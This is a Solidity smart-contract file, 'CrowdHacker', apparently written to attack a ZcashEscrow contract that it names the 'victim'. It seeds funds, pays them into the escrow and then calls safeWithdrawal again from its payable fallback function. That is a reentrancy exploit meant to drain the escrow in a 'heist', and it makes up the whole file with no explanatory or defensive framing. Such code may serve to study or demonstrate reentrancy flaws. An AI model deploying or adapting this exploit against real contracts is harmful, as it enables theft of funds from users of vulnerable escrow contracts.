pragma solidity ^0.4.1;

import "./ZcashEscrow.solc";

contract CrowdHacker {

  ZcashEscrow public victim;
  address public owner;
  uint public paid;
 
  function CrowdHacker() {
    owner = msg.sender;
  }

  function initiateHack(address _victim) {
    victim = ZcashEscrow(_victim);
    paid = 0;
  }

  // Pay into the CrowdHacker to seed the heist
  function seedThePot() payable {
  }

  function payIntoVictim() {
    victim.payIn.value(this.balance)("Crowd Hacker");
  }

  function startTheHeist() {
    victim.safeWithdrawal();
  }

  function() payable {
    victim.safeWithdrawal();
  }

  function kill() {
    if (msg.sender == owner) {
      selfdestruct(owner);
    }
  }

}
